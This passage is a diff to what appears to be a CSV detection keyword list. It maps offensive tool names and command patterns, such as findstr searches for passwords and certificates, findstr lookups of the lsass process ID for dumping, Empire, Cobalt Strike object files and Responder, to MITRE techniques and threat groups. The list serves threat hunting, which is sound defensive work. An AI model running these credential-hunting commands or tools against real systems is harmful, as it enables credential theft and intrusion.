T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*FindProcHandle *lsass*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","0","N/A","10","10","263","50","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z" -"*Find-ProtectionSoftware*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Find-PSScriptsInPSAppLog*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-ProtectionSoftware*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Find-PSScriptsInPSAppLog*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-PSServiceAccounts.ps1*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"*Find-RDPClientConnections*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*FindSMB2UPTime.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*Find-RDPClientConnections*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*FindSMB2UPTime.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*Findsploit*","offensive_tool_keyword","Findsploit","Finsploit is a simple bash script to quickly and easily search both local and online exploit databases. This repository also includes copysploit to copy any exploit-db exploit to the current directory and compilesploit to automatically compile and run any C exploit (ie. ./copysploit 1337.c && ./compilesploit 1337.c)","T1210 - T1105 - T1218","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/1N3/Findsploit","1","1","N/A","N/A","10","1493","334","2021-09-27T01:43:24Z","2015-03-16T16:15:55Z" "*findstr *BEGIN CERTIFICATE*","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*findstr *confidential*","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*findstr *net use*","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*findstr *password*","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*findstr lsass*","offensive_tool_keyword","findstr","findstr used to find lsass pid in order to dump lsass process","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*findstr lsass*","offensive_tool_keyword","findstr","findstr used to find lsass pid in order to dump lsass process","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*findstr.exe Tvndrgaaa*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Findsubdomains*","offensive_tool_keyword","findsubdomains","A subdomains discovery tool that collects all possible subdomains from open source internet and validates them through various tools to provide accurate results.","T1590 - T1591 - T1595 - T1596 - T1599","TA0011","N/A","N/A","Information Gathering","https://findsubdomains.com/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Find-TrustedDocuments*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Find-TrustedDocuments.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Find-TrustedDocuments.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1076","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*FindUncommonShares.git*","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","1","N/A","N/A","4","331","38","2023-10-03T21:49:54Z","2021-10-06T12:30:16Z" +"*Find-TrustedDocuments*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Find-TrustedDocuments.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-TrustedDocuments.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1076","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*FindUncommonShares.git*","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","1","N/A","N/A","4","332","38","2023-10-04T03:52:10Z","2021-10-06T12:30:16Z" "*FindUncommonShares.p*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*FindUncommonShares.py *","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","0","N/A","N/A","4","331","38","2023-10-03T21:49:54Z","2021-10-06T12:30:16Z" -"*FindUncommonShares-main*","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","1","N/A","N/A","4","331","38","2023-10-03T21:49:54Z","2021-10-06T12:30:16Z" -"*finduncshar_scan*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*FindUncommonShares.py *","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","0","N/A","N/A","4","332","38","2023-10-04T03:52:10Z","2021-10-06T12:30:16Z" +"*FindUncommonShares-main*","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","1","N/A","N/A","4","332","38","2023-10-04T03:52:10Z","2021-10-06T12:30:16Z" +"*finduncshar_scan*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*Find-UnsafeLogonScriptPermissions.ps1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" "*Find-UnsafeUNCPermissions -UNCScripts*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" "*Find-UnsafeUNCPermissions.ps1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" -"*Find-UserField -SearchField *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Find-WMILocalAdminAccess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*FireBuster.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*fireeye*commando*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6323","1248","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*Find-UserField -SearchField *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 